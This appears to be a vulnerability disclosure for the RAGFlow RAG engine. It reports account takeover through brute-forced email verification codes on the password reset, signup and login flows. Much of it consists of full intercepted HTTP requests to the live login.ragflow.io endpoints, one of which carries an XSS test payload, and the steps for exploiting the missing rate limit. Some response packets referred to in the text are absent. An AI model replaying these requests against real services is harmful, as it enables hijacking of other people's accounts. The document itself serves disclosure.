RAGFlow

RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine developed by Infiniflow, focused on deep document understanding and designed to provide efficient and scalable question-answering system solutions for various enterprises.

Community activity: over 50,000 stars, 5,000 forks, and more than 250 contributors.

Project Homepage: https://github.com/infiniflow/ragflow

Demo URL: https://demo.ragflow.io

Vulnerability Description

RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. Versions 0.18.1 and earlier are vulnerable to an account takeover flaw that allows attackers to brute-force email verification codes to perform arbitrary account registration, login, and password reset. As of the time of publication, no patched version is available.

[1]Vulnerability Steps

1.Navigate to the password reset page.

2.Enter the victim’s username.

3.The system will send a verification code to the victim’s email.

4.Enter any verification code and click “Next.” At this point, intercept the request, which corresponds to the /api/verify-code endpoint.

The specific request packet is as follows:

POST /api/verify-code HTTP/1.1
Host: login.ragflow.io
Cookie: casdoor_session_id=24ca5a1c9266ee51064b56ab498de2ac; organizationTheme={"themeType":"dark","colorPrimary":"#5734d3","borderRadius":2,"isCompact":false,"isEnabled":true}; organizationLogo=https://github.com/infiniflow/ragflow/raw/main/web/src/assets/logo-with-text.png; organizationFootHtml=
Content-Length: 136
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh;q=0.9,en;q=0.8
Sec-Ch-Ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
Content-Type: text/plain;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Origin: https://login.ragflow.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://login.ragflow.io/forget/RAGFlow
Accept-Encoding: gzip, deflate
Priority: u=1, i
Connection: close

{"application":"RAGFlow","organization":"infiniflow","username":"victim email","name":"aaas2","code":"501777","type":"login"}

5.The response packet is as follows:

6.After replacing the intercepted response packet, the following password reset page is displayed:

7.Clicking “Change Password” triggers the password reset request packet:

POST /api/set-password HTTP/1.1
Host: login.ragflow.io
Cookie: casdoor_session_id=24ca5a1c9266ee51064b56ab498de2ac; organizationTheme={"themeType":"dark","colorPrimary":"#5734d3","borderRadius":2,"isCompact":false,"isEnabled":true}; organizationLogo=https://github.com/infiniflow/ragflow/raw/main/web/src/assets/logo-with-text.png; organizationFootHtml=
Content-Length: 557
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh;q=0.9,en;q=0.8
Sec-Ch-Ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6zphfvJ3DZ0xdxzB
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Origin: https://login.ragflow.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://login.ragflow.io/forget/RAGFlow
Accept-Encoding: gzip, deflate
Priority: u=1, i
Connection: close

------WebKitFormBoundary6zphfvJ3DZ0xdxzB
Content-Disposition: form-data; name="userOwner"

infiniflow
------WebKitFormBoundary6zphfvJ3DZ0xdxzB
Content-Disposition: form-data; name="userName"

aaas2
------WebKitFormBoundary6zphfvJ3DZ0xdxzB
Content-Disposition: form-data; name="oldPassword"


------WebKitFormBoundary6zphfvJ3DZ0xdxzB
Content-Disposition: form-data; name="newPassword"

aaassssD21
------WebKitFormBoundary6zphfvJ3DZ0xdxzB
Content-Disposition: form-data; name="code"

501777
------WebKitFormBoundary6zphfvJ3DZ0xdxzB--

Ultimately, the account takeover is successfully achieved.

[2]Vulnerability Steps

1.Navigate to the registration page

2.Enter the victim’s email address for registration.

3.The system then sends a verification code to the victim’s email.

4.Enter any verification code and click “Sign Up”, then intercept the request. The corresponding endpoint is /api/signup. Perform a brute-force attack on the verification code. As shown below, there is no rate limiting in place:

5.The specific request packet is as follows:

POST /api/signup HTTP/1.1
Host: login.ragflow.io
Cookie: casdoor_session_id=24ca5a1c9266ee51064b56ab498de2ac; organizationTheme={"themeType":"dark","colorPrimary":"#5734d3","borderRadius":2,"isCompact":false,"isEnabled":true}; organizationLogo=https://github.com/infiniflow/ragflow/raw/main/web/src/assets/logo-with-text.png; organizationFootHtml=
Content-Length: 251
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh;q=0.9,en;q=0.8
Sec-Ch-Ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
Content-Type: text/plain;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Origin: https://login.ragflow.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://login.ragflow.io/signup/oauth/authorize?client_id=87fe30c13277b95d37b5&response_type=code&redirect_uri=https://demo.ragflow.io/v1/user/oauth_callback&scope=read
Accept-Encoding: gzip, deflate
Priority: u=1, i
Connection: close

{"application":"RAGFlow","organization":"infiniflow","username":"aaassssD2","name":"<script>alert(1)</script>","password":"12#Password","confirm":"aaassssD2","email":"Victim EMAIL","emailCode":"698623","agreement":true,"plan":null,"pricing":null}

6.The response packet is as follows:

This indicates that we have successfully achieved arbitrary user registration.

[3]Vulnerability Steps

On the login page, users can log in using an email verification code. Since this also relies on the /api/verify-code endpoint, it introduces a vulnerability that allows arbitrary user login, leading to full account takeover.